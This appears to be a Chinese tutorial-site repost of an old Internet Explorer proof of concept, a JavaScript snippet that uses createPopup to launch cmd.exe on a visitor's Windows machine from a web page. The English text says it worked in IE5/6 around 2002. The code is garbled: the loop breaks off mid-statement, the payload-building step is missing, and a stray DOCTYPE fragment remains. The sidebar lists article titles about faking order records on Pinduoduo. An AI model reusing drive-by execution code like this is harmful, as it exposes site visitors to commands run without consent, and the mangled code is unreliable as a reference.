最新下载
热门教程
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
忘了是哪个网站上抄下来的了,javascript运行客户端exe程序
时间:2022-06-30 10:02:57 编辑:袖梨 来源:一聚教程网
PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
var programName=new Array(
'c:/windows/system32/cmd.exe',
'c:/winnt/system32/cmd.exe',
'c:/cmd.exe'
);
function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n
oPopBody.innerHTML=html;
oPopup.show(290, 190, 200, 200, document.body);
}
Hmm, let's start a command shell...
This page doesn't do anything malicious, but is a demonstration of how to execute a program on a remote machine using the
marvelously secure Internet Explorer web browser!!
Up until at least 18/02/02, this script would open a command window when viewed in IE5/6 under WindowsXP and Win2k (possibly also WinME). There
are currently no patches available using "Windows Update" which will prevent this.
相关文章
- 支付宝怎样添加家庭共济账户?支付宝如何弄家庭共济 07-30
- 拼多多里全球购店铺靠谱吗?拼多多全球购是正品嘛 07-30
- 拼多多热门爆款商品有哪些?拼多多哪些爆款商品可以买 07-30
- 拼多多爆款商品关键词如何找?拼多多关键词曝光率低怎么办 07-30
- 拼多多日销订单怎么补?拼多多日销订单记录怎么补 07-30
- 拼多多怎样有效补单?拼多多有效补单方法 07-30